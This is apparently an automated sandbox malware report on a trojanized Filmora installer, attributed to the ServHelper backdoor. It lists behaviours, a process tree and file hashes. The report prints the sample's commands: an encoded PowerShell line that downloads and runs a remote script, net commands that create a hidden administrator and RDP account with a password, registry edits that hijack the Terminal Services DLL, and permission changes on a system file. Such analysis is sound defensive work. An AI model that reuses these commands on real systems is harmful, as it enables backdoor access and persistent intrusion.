Analysis
-
max time kernel
138s -
max time network
117s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
20-07-2021 07:50
Static task
static1
Behavioral task
behavioral1
Sample
Filmora-Wondershare-Installer.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Filmora-Wondershare-Installer.exe
Resource
win10v20210410
General
-
Target
Filmora-Wondershare-Installer.exe
-
Size
9.2MB
-
MD5
5e12e56a643c71b913ea60f48f28726d
-
SHA1
8fd9ef3e15b545335c9cf8a16e7d49bdedc7b6fd
-
SHA256
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d
-
SHA512
807888068394b8072d607a83b7a181f5018c21c1efd2b8ae433ac59dc28bfbec23e1b13d8b6a2447a3ff8bb9b7ecd71d4d7bff55903a2d23a60b817142c9bae3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 12 1836 powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
ViJoy.exeexe2.exeexe1.exeNFWCHK.exepid process 1056 ViJoy.exe 1624 exe2.exe 2040 exe1.exe 1292 NFWCHK.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 832 takeown.exe 1992 icacls.exe 796 icacls.exe 1804 icacls.exe 1960 icacls.exe 1484 icacls.exe 1900 icacls.exe 1476 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 2044 powershell.exe -
Loads dropped DLL 7 IoCs
Processes:
ViJoy.exeexe2.exepid process 1056 ViJoy.exe 1056 ViJoy.exe 1056 ViJoy.exe 1624 exe2.exe 1484 1484 1196 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exepid process 1992 icacls.exe 796 icacls.exe 1804 icacls.exe 1960 icacls.exe 1484 icacls.exe 1900 icacls.exe 1476 icacls.exe 832 takeown.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
exe2.exedescription ioc process File opened for modification \??\PhysicalDrive0 exe2.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_40c367b8-517b-4880-b94d-383995d0e480 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7511a7f7-903d-42c8-a316-773feb473b3c powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f0683a33-bf2e-40c8-a33f-6064b7fa2c32 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9Q6BWQDTE39RP6Y1XGJA.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe7b6941-0062-49dd-a05d-764029b6e0d6 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bb09eabe-97d3-49af-bbc9-5bbf98900e14 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a7ced0ac-0a81-432c-9e4d-9bdf1ebb0d8b powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8b981ef7-2a8c-4be0-ab08-71c802a82e5d powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4eadccf0-6873-42f8-99cd-bdfc08317d14 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8368d908-8885-440e-bc70-5de0761305ef powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f0ef6c8-b3d8-4af0-acfc-e0f4a63e5398 powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8c98422c-86f1-4e07-9f32-0dc5dd376179 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
exe2.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main exe2.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exeWMIC.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d01827764c7dd701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2044 powershell.exe 2044 powershell.exe 1712 powershell.exe 1712 powershell.exe 1320 powershell.exe 1320 powershell.exe 936 powershell.exe 936 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe 1836 powershell.exe 1836 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 472 1484 1484 1484 1484 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 2044 powershell.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeDebugPrivilege 936 powershell.exe Token: SeRestorePrivilege 796 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1612 WMIC.exe Token: SeIncreaseQuotaPrivilege 1612 WMIC.exe Token: SeAuditPrivilege 1612 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1612 WMIC.exe Token: SeIncreaseQuotaPrivilege 1612 WMIC.exe Token: SeAuditPrivilege 1612 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1192 WMIC.exe Token: SeIncreaseQuotaPrivilege 1192 WMIC.exe Token: SeAuditPrivilege 1192 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1192 WMIC.exe Token: SeIncreaseQuotaPrivilege 1192 WMIC.exe Token: SeAuditPrivilege 1192 WMIC.exe Token: SeDebugPrivilege 1836 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
exe2.exepid process 1624 exe2.exe 1624 exe2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Filmora-Wondershare-Installer.exeViJoy.exeexe2.exeexe1.exepowershell.execsc.exedescription pid process target process PID 1992 wrote to memory of 1056 1992 Filmora-Wondershare-Installer.exe ViJoy.exe PID 1992 wrote to memory of 1056 1992 Filmora-Wondershare-Installer.exe ViJoy.exe PID 1992 wrote to memory of 1056 1992 Filmora-Wondershare-Installer.exe ViJoy.exe PID 1992 wrote to memory of 1056 1992 Filmora-Wondershare-Installer.exe ViJoy.exe PID 1056 wrote to memory of 1624 1056 ViJoy.exe exe2.exe PID 1056 wrote to memory of 1624 1056 ViJoy.exe exe2.exe PID 1056 wrote to memory of 1624 1056 ViJoy.exe exe2.exe PID 1056 wrote to memory of 1624 1056 ViJoy.exe exe2.exe PID 1056 wrote to memory of 1624 1056 ViJoy.exe exe2.exe PID 1056 wrote to memory of 1624 1056 ViJoy.exe exe2.exe PID 1056 wrote to memory of 1624 1056 ViJoy.exe exe2.exe PID 1056 wrote to memory of 2040 1056 ViJoy.exe exe1.exe PID 1056 wrote to memory of 2040 1056 ViJoy.exe exe1.exe PID 1056 wrote to memory of 2040 1056 ViJoy.exe exe1.exe PID 1056 wrote to memory of 2040 1056 ViJoy.exe exe1.exe PID 1624 wrote to memory of 1292 1624 exe2.exe NFWCHK.exe PID 1624 wrote to memory of 1292 1624 exe2.exe NFWCHK.exe PID 1624 wrote to memory of 1292 1624 exe2.exe NFWCHK.exe PID 1624 wrote to memory of 1292 1624 exe2.exe NFWCHK.exe PID 2040 wrote to memory of 2044 2040 exe1.exe powershell.exe PID 2040 wrote to memory of 2044 2040 exe1.exe powershell.exe PID 2040 wrote to memory of 2044 2040 exe1.exe powershell.exe PID 2044 wrote to memory of 1836 2044 powershell.exe csc.exe PID 2044 wrote to memory of 1836 2044 powershell.exe csc.exe PID 2044 wrote to memory of 1836 2044 powershell.exe csc.exe PID 1836 wrote to memory of 1256 1836 csc.exe cvtres.exe PID 1836 wrote to memory of 1256 1836 csc.exe cvtres.exe PID 1836 wrote to memory of 1256 1836 csc.exe cvtres.exe PID 2044 wrote to memory of 1712 2044 powershell.exe powershell.exe PID 2044 wrote to memory of 1712 2044 powershell.exe powershell.exe PID 2044 wrote to memory of 1712 2044 powershell.exe powershell.exe PID 2044 wrote to memory of 1320 2044 powershell.exe powershell.exe PID 2044 wrote to memory of 1320 2044 powershell.exe powershell.exe PID 2044 wrote to memory of 1320 2044 powershell.exe powershell.exe PID 2044 wrote to memory of 936 2044 powershell.exe powershell.exe PID 2044 wrote to memory of 936 2044 powershell.exe powershell.exe PID 2044 wrote to memory of 936 2044 powershell.exe powershell.exe PID 2044 wrote to memory of 832 2044 powershell.exe takeown.exe PID 2044 wrote to memory of 832 2044 powershell.exe takeown.exe PID 2044 wrote to memory of 832 2044 powershell.exe takeown.exe PID 2044 wrote to memory of 1992 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1992 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1992 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 796 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 796 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 796 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1804 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1804 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1804 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1960 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1960 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1960 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1484 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1484 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1484 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1900 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1900 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1900 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1476 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1476 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1476 2044 powershell.exe icacls.exe PID 2044 wrote to memory of 1392 2044 powershell.exe reg.exe PID 2044 wrote to memory of 1392 2044 powershell.exe reg.exe PID 2044 wrote to memory of 1392 2044 powershell.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe"C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeC:\Users\Public\Documents\Wondershare\NFWCHK.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'4⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nxuc2dlj\nxuc2dlj.cmdline"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES582E.tmp" "c:\Users\Admin\AppData\Local\Temp\nxuc2dlj\CSCCDA85287E7DB45DA882073315032C4F.TMP"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f5⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f5⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr5⤵
-
C:\Windows\system32\cmd.execmd /c net start rdpdr6⤵
-
C:\Windows\system32\net.exenet start rdpdr7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService5⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService6⤵
-
C:\Windows\system32\net.exenet start TermService7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f5⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc U1c5mslM /add1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc U1c5mslM /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc U1c5mslM /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc U1c5mslM1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc U1c5mslM2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc U1c5mslM3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1ad739af-3608-4f96-85b2-5f16e3da6238MD5
e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1e551be3-2904-4dfa-970d-2a164673387cMD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ad2b47ae-a6b1-467b-9148-e7e6ea6cfcf1MD5
faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc735e57-efea-487b-88df-36312f416854MD5
6f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c60de83e-89bf-4772-ab97-e17af5f8f790MD5
7f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e4012ae3-c5bb-4638-bcd2-1a338b05e279MD5
d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e41ad7b7-d184-43fd-8170-84176440cfa9MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
fa61023cad46f8cb35dc1a73dc1d1aef
SHA1d9e23c26a75a0c75e059cb143e719655c337d073
SHA25665730cf956eb64e169a64439e0124671f0bd397b2579d95431baf9f7c5752cd7
SHA5129ce73f215f82d35fc11509779d730692b6db925046b0359228e68b6a42f0a8f9fc3dafd9a18cf0f24fb81dc570f5745c1197095b2c5ab0d4d6e1795844440617
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
665ea446aad53a3d5e135dc4f76965f6
SHA1d72dc1ae1d0ff2ab4b8207bb4f36282644616e28
SHA256fa163790647880d9f6f48c9de6b27a1a599fcb8a0406c66d0ed3eec63deea586
SHA512cbd860a63485306525d70c30fa511ea212c53ac821851e28ccb009341e12c688648baa2d2d9fa56798bf5386791a38124b1a9810b929a89f35d72877d54517d1
-
C:\Users\Admin\AppData\Local\Temp\RES582E.tmpMD5
e94a5e88c606ddced2de05a2a2fa757d
SHA1b5837a746fbd51437a296dec5e6e579c1523eead
SHA256d71d4021fd1c4c809cfcc6e4ad59ca9bb586606092fc32ef715aa2949ed642a7
SHA5125c54a8cd0f807175639feade4e9e376bbfd95808ddb979e3ad689c2cb04b8614a3ce9a0c04d569f6a12feb34f0deffba7c35f3c1a68b7e2abef1e87b6255cb3b
-
C:\Users\Admin\AppData\Local\Temp\Setup.zipMD5
36f178576dcb8db35d6f06448b1eb510
SHA162277c90cc2b1bb81b36571037afe5081b0605d5
SHA256192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a
